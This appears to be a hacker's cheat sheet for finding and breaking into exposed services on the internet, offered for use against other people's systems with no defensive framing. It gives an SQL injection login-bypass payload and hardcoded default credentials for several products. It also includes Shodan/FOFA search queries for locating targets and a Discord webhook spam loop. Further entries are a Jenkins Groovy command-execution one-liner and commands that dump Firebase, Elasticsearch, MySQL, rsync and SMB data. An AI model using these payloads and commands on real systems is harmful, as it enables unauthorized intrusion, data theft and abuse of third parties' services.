- Admin login panels vulnerable to SQLi
- Algo hardcoded password
- Android debug bridge misconfiguration
- BigAnt Admin hardcoded password
- Cassandra exposed databases authfree
- Elasticsearch misconfiguration
- Find exposed discord webhooks
- Firebase misconfiguration
- FTP servers with anonymous login allowed
- Fujitsu IP series hardcoded credentials
- Jenkins code execution
- LG Signage default credentials
- Redis auth free access
- Rsync exposed files
- SIMATIC HMI_Panel default credentials
- SMB server misconfiguration
- Vinchin default MySQL credentials
- VNC Servers with auth disabled
"A bit of my experience about messing around on the internet"
Payload: 1'or'1'='1
intitle:"Login" inurl:/admin/index.php
Default password: algo
Debian: apt install android-tools
Arch: pacman -S android-tools
Use this bash script or connect manually (default port is 5555)
"Android debug bridge (ADB)" -Authentication
Default password: 123456
"password: <span style=\"color:red\">123456</span>"
Default credentials (if they really require one) are cassandra:cassandra
Use cqldump
Simplest way to spam into a webhook in python:
while True: __import__("requests").post("<webhook>", data={"content":"@here hey"})"https://discord.com/api/webhooks/"
The answer is obviously yes, i made this script.
The code snippet used to connect to firebase is often leaved in the main html page of websites, and it looks like this:
var config = {
apiKey: "3x4mpl3",
authDomain: "example.firebaseapp.com",
databaseURL: "https://example.firebaseio.com",
projectId: "example",
storageBucket: "example.appspot.com",
messagingSenderId: "6969"
};
firebase.initializeApp(config);Just go to database url + /.json to dump all
body="firebase.initializeApp(config);" && body="databaseURL"
Base URL + /_cat/indices?v
Base URL + /<name>/_search?pretty=true&size=9999
protocol="elastic" && banner="200 OK"
Username: anonymous
Password: guest
port:21 "Login successful" "FTP server ready"
port:21 "Login successful"
Username: fedish264pro OR fedish265pro
Password: h264pro@broadsight OR h265pro@broadsight
"Server: thttpd/2.25b 29dec2003" && "Content-Length: 1133"
Select Manage Jenkins > Console Script (Generally /script or /manage/script)
Groovy oneliner for injecting system commands:
println("<your cmd>".execute().text)title:"Dashboard [Jenkins]"+"Manage jenkins"
Default password: 00000000
iconhash:79487298 && title:"LG Signage"
Install redis-cli
redis-cli -h <ip>
Use your own package manager
rsync --list-only <address>::<directory (leave blank for all)>
rsync -avh <address>::<directory (leave blank for all)> $(pwd)
Default username: Administrator
Default password: 100
Debian: apt install samba
Arch: pacman -S smbclient
smbclient -N \\\\{address}\\Users
port:445 "Authentication: disabled" "Users"
Username: vinchin
Password: yunqi123456
mysqldump -h <host> -u vinchin -pyunqi123456 --all-databases --result-file=dump.sql
web.title="Vinchin Backup & Recovery"
Download Vnc viewer Insert the IP address and port (default is 5900) and connect,
select ok when unencrypted connection warning appears.